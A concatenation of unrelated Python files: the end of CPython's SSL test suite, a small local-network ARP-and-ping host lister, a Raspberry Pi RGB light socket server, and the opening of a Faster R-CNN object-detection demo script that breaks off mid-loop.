with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
# Ignore expected SSLError in ConnectionHandler of ThreadedEchoServer
# (it is only raised sometimes on Windows)
with support.catch_threading_exception() as cm:
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=support.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(support.unlink, support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(support.TESTFN))
ctx.keylog_filename = support.TESTFN
self.assertEqual(ctx.keylog_filename, support.TESTFN)
self.assertTrue(os.path.isfile(support.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(support.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(support.unlink, support.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = support.TESTFN
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(support.unlink, support.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = support.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
main.py
|
#!/usr/bin/python3
import os
import sys
import subprocess
import threading
from termcolor import colored
import pyfiglet
ascii_banner = pyfiglet.figlet_format("PYSCAN")
print(colored(ascii_banner, 'green'))
def getStringFromBraces(string):
return string.replace('(', '').replace(')','')
def drawHost(hostString):
args = hostString.split(" ")
print(colored(getStringFromBraces(args[0]), 'red'), colored('[', 'blue'), colored(getStringFromBraces(args[1]), 'green'), colored(']', 'blue'))
print("Starting arp scan...", end='\r')
arpResult = subprocess.run(['arp', '-a'], stdout=subprocess.PIPE).stdout.decode('utf-8 ')
print("Finished arp scan...", end='\r')
ips = list(map(lambda e: e.split(")")[0], arpResult.split("(")))[1::]
connections = arpResult.split("\n")
hosts = list(map(lambda e: e.split(" ")[0].replace('?', 'unknown')+' '+getStringFromBraces(e.split(" ")[1]), arpResult.split("\n")[:-1:] ))
reachable_ips = []
not_reachable_ips = []
ips_checked = 0
reachable_hosts = []
def progressBar(current, total, barLength = 20):
percent = float(current) * 100 / total
arrow = '-' * int(percent/100 * barLength - 1) + '>'
spaces = ' ' * (barLength - len(arrow))
finished = ''
ending = ''
if percent == 100:
ending = '\n'
finished = 'finished!'
sys.stdout.write(f'\rProgress: [%s%s] %d %% [{current}/{total}] {finished}{ending}' % (arrow, spaces, percent))
sys.stdout.flush()
progressBar(ips_checked, len(ips))
def check_reachable_ips(ip, number):
global reachable_ips, not_reachable_ips, ips_checked, ips
HOST_UP = not 'returncode=2' in str(subprocess.run(['ping', '-c', '1', ip], stdout=subprocess.PIPE))
if HOST_UP:
reachable_ips.append(ip)
reachable_hosts.append(number)
else:
not_reachable_ips.append(ip)
ips_checked += 1
progressBar(ips_checked, len(ips))
def ipList(hostIndexes):
if len(hostIndexes) == 0:
return 'No devices found'
for i in range(len(hostIndexes)):
drawHost(hosts[i])
try:
for i, ip in enumerate(ips):
x = threading.Thread(target=check_reachable_ips, args=(ip, i))
x.start()
while ips_checked != len(ips):
pass
except KeyboardInterrupt:
print(colored('[-]', 'red'), 'Stopping scan...')
sys.exit()
print(f'\nDevices found on your network ({len(reachable_ips)} of {ips_checked}):')
ipList(reachable_hosts)
sys.stdout.flush()
|
rgb_server.py
|
#!/usr/bin/env python3
# gets rgb value from client and sets lights accordingly
from ast import Bytes
import socket
import logging
import os
import time
import multiprocessing
import copy
from rgb import RGB
#configs:
HOST = '192.168.1.69' # change this values depending on the ip of your pi
PORT = 65432 # you may need to change this if this port is already in use
# receives message from client. Return list of bytes
def getMessage():
data = conn.recv(8) # getting junk byte (see client file for more information)
data = conn.recv(1024)
data_list = []
for byte in data:
data_list.append(byte)
log(f"Input from client: {data_list}")
return data_list
# takes a string input. Prints string + current time in order to log the event
def log(message):
os.environ['TZ'] = "Eastern Standard Time"
current_time = time.strftime("%H:%M:%S")
print(f"[{current_time}] {message}")
# main:
if __name__ == "__main__":
# creating light object
strip = RGB()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
try:
s.bind((HOST, PORT))
light_process = None
copy_process = None
lights_on = True
# server loop
while True:
log("Looking for connection")
s.listen()
conn, addr = s.accept()
with conn:
log("Client connected")
# connection loop
while True:
try:
# taking input
input = getMessage()
# freeing microprocess if applicable
if light_process != None and input[0] != 4 and input[0] != 6 and lights_on:
light_process.terminate()
light_process.join()
log(light_process)
# interpreting input and assigning process
if input[0] == 0:
log("Setting strip to solid color")
light_process = multiprocessing.Process(target=strip.set_color, args=(input[1:-2], input[-2], input[-1]))
elif input[0] == 1:
log("Setting gradient")
light_process = multiprocessing.Process(target=strip.set_gradient, args=(input[1:4], input[4:-4], input[-4], input[-3], input[-2], input[-1]))
elif input[0] == 2:
log("Setting color fade")
light_process = multiprocessing.Process(target=strip.set_color_fade, args=(input[1:-1], input[-1]))
elif input[0] == 3:
log("Setting color bands")
light_process = multiprocessing.Process(target=strip.set_color_band, args=(input[1:-4], input[-4], input[-3], input[-2], input[-1]))
elif input[0] == 4:
log("changing brightness")
# until I get base manager working- instead of accessing the brightness of the currently running process, a copy is made, brightness is changed, and the process is restarted based on the copy.
# This is dirty, but base managers are confusing.
if lights_on:
if light_process != None:
light_process.terminate()
light_process.join()
if copy_process != None:
light_process = copy.copy(copy_process)
strip.set_brightness(input[1])
elif input[0] == 5:
log(f"Lights on: {not lights_on}")
# if lights are on we disable the lights and set
if lights_on:
if light_process != None:
light_process.terminate()
light_process.join()
if copy_process != None:
light_process = copy.copy(copy_process)
strip.set_color([0, 0, 0])
lights_on = not lights_on
elif input[0] == 6:
log("sending status to client")
if lights_on:
int_val = 1
conn.send(int_val.to_bytes(2, "big"))
else:
int_val = 0
conn.send(int_val.to_bytes(2, "big"))
# starting process
if light_process != None and lights_on and input[0] != 6:
copy_process = copy.copy(light_process)
light_process.start()
except ConnectionResetError as e:
if e.errno == 104:
log("Client has disconnected")
else:
logging.exception("connection_loop:")
break
except Exception:
logging.exception("connection_loop:")
break
except Exception:
logging.exception("server_loop:")
except KeyboardInterrupt:
log("Shutting down server")
|
demo_multi_thread.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# --------------------------------------------------------
# Tensorflow Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Jiasen Lu, Jianwei Yang, based on code from Ross Girshick
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from threading import Thread
import _init_paths
import os
import sys
import numpy as np
import argparse
import pprint
import pdb
import time
import cv2
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
import torchvision.transforms as transforms
import torchvision.datasets as dset
from scipy.misc import imread, imresize
from roi_data_layer.roidb import combined_roidb
from roi_data_layer.roibatchLoader import roibatchLoader
from model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from model.rpn.bbox_transform import clip_boxes
from model.nms.nms_wrapper import nms
from model.rpn.bbox_transform import bbox_transform_inv
from model.utils.net_utils import save_net, load_net, vis_detections, vis_kiktech_detections
from model.utils.blob import im_list_to_blob
from model.faster_rcnn.vgg16 import vgg16
from model.faster_rcnn.resnet import resnet
from model.faster_rcnn.mobilenet import mobilenet
from model.faster_rcnn.shufflenet import shufflenet
from scipy import misc
import Metrics
import pdb
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Fast R-CNN network')
parser.add_argument('--dataset', dest='dataset',
help='training dataset',
default='pascal_voc', type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default='cfgs/vgg16.yml', type=str)
parser.add_argument('--net', dest='net',
help='vgg16, res50, res101, res152',
default='res101', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--load_dir', dest='load_dir',
help='directory to load models',
default="/srv/share/jyang375/models")
parser.add_argument('--image_dir', dest='image_dir',
help='directory to load images for demo',
default="images")
parser.add_argument('--cuda', dest='cuda',
help='whether use CUDA',
action='store_true')
parser.add_argument('--mGPUs', dest='mGPUs',
help='whether use multiple GPUs',
action='store_true')
parser.add_argument('--cag', dest='class_agnostic',
help='whether perform class_agnostic bbox regression',
action='store_true')
parser.add_argument('--parallel_type', dest='parallel_type',
help='which part of model to parallel, 0: all, 1: model before roi pooling',
default=0, type=int)
parser.add_argument('--checksession', dest='checksession',
help='checksession to load model',
default=1, type=int)
parser.add_argument('--checkepoch', dest='checkepoch',
help='checkepoch to load network',
default=1, type=int)
parser.add_argument('--checkpoint', dest='checkpoint',
help='checkpoint to load network',
default=10021, type=int)
parser.add_argument('--bs', dest='batch_size',
help='batch_size',
default=1, type=int)
parser.add_argument('--vis', dest='vis',
help='visualization mode',
action='store_true')
parser.add_argument('--webcam_num', dest='webcam_num',
help='webcam ID number',
default=-1, type=int)
# Start add by Minming, add the gt into the visualization
parser.add_argument('--data_path', dest='data_path',
help='the ground truth of the data set',
default="./data/kiktech/kiktech2018joint10", )
# End add
args = parser.parse_args()
return args
lr = cfg.TRAIN.LEARNING_RATE
momentum = cfg.TRAIN.MOMENTUM
weight_decay = cfg.TRAIN.WEIGHT_DECAY
def _get_image_blob(im):
"""Converts an image into a network input.
Arguments:
im (ndarray): a color image in BGR order
Returns:
blob (ndarray): a data blob holding an image pyramid
im_scale_factors (list): list of image scales (relative to im) used
in the image pyramid
"""
im_orig = im.astype(np.float32, copy=True)
im_orig -= cfg.PIXEL_MEANS
im_shape = im_orig.shape
im_size_min = np.min(im_shape[0:2])
im_size_max = np.max(im_shape[0:2])
processed_ims = []
im_scale_factors = []
for target_size in cfg.TEST.SCALES:
im_scale = float(target_size) / float(im_size_min)
# Prevent the biggest axis from being more than MAX_SIZE
if np.round(im_scale * im_size_max) > cfg.TEST.MAX_SIZE:
im_scale = float(cfg.TEST.MAX_SIZE) / float(im_size_max)
im = cv2.resize(im_orig, None, None, fx=im_scale, fy=im_scale,
interpolation=cv2.INTER_LINEAR)
im_scale_factors.append(im_scale)
processed_ims.append(im)
# Create a blob to hold the input images
blob = im_list_to_blob(processed_ims)
return blob, np.array(im_scale_factors)
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.USE_GPU_NMS = args.cuda
print('Using config:')
pprint.pprint(cfg)
np.random.seed(cfg.RNG_SEED)
# train set
# -- Note: Use validation set and disable the flipped to enable faster loading.
input_dir = args.load_dir + "/" + args.net + "/" + args.dataset
if not os.path.exists(input_dir):
raise Exception('There is no input directory for loading network from ' + input_dir)
load_name = os.path.join(input_dir,
'faster_rcnn_{}_{}_{}.pth'.format(args.checksession, args.checkepoch, args.checkpoint))
pascal_classes = np.asarray(['__background__',
'person'
])
##now test with 20 classes
pascal_classes = ('__background__', # always index 0
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair',
'cow', 'diningtable', 'dog', 'horse',
'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor')
# initilize the network here.
if args.net == 'vgg16':
fasterRCNN = vgg16(pascal_classes, pretrained=False, class_agnostic=args.class_agnostic)
elif args.net == 'res101':
fasterRCNN = resnet(pascal_classes, 101, pretrained=False, class_agnostic=args.class_agnostic)
elif args.net == 'res50':
fasterRCNN = resnet(pascal_classes, 50, pretrained=False, class_agnostic=args.class_agnostic)
elif args.net == 'res152':
fasterRCNN = resnet(pascal_classes, 152, pretrained=False, class_agnostic=args.class_agnostic)
elif args.net == 'mobilenet':
fasterRCNN = mobilenet(pascal_classes, pretrained=False, class_agnostic=args.class_agnostic)
elif args.net == 'shufflenet':
fasterRCNN = shufflenet(pascal_classes, pretrained=False, class_agnostic=args.class_agnostic)
else:
print("network is not defined")
pdb.set_trace()
fasterRCNN.create_architecture()
print("load checkpoint %s" % (load_name))
if args.cuda > 0:
checkpoint = torch.load(load_name)
else:
checkpoint = torch.load(load_name, map_location=(lambda storage, loc: storage))
fasterRCNN.load_state_dict(checkpoint['model'])
if 'pooling_mode' in checkpoint.keys():
cfg.POOLING_MODE = checkpoint['pooling_mode']
print('load model successfully!')
# pdb.set_trace()
print("load checkpoint %s" % (load_name))
# initilize the tensor holder here.
im_data = torch.FloatTensor(1)
im_info = torch.FloatTensor(1)
num_boxes = torch.LongTensor(1)
gt_boxes = torch.FloatTensor(1)
dl_data = torch.LongTensor(1)
# ship to cuda
if args.cuda > 0:
im_data = im_data.cuda()
im_info = im_info.cuda()
num_boxes = num_boxes.cuda()
gt_boxes = gt_boxes.cuda()
dl_data = dl_data.cuda()
# make variable
im_data = Variable(im_data, volatile=True)
im_info = Variable(im_info, volatile=True)
num_boxes = Variable(num_boxes, volatile=True)
gt_boxes = Variable(gt_boxes, volatile=True)
dl_data = Variable(dl_data, volatile=True)
if args.cuda > 0:
cfg.CUDA = True
if args.cuda > 0:
fasterRCNN.cuda()
fasterRCNN.eval()
start = time.time()
max_per_image = 100
thresh = 0.05
vis = True
webcam_num = args.webcam_num
# Set up webcam or get image directories
if webcam_num >= 0:
cap = cv2.VideoCapture(webcam_num)
num_images = 0
else:
imglist = os.listdir(args.image_dir)
num_images = len(imglist)
print('Loaded Photo: {} images.'.format(num_images))
all_time = 0
while (num_images >= 0):
total_tic = time.time()
if webcam_num == -1:
num_images -= 1
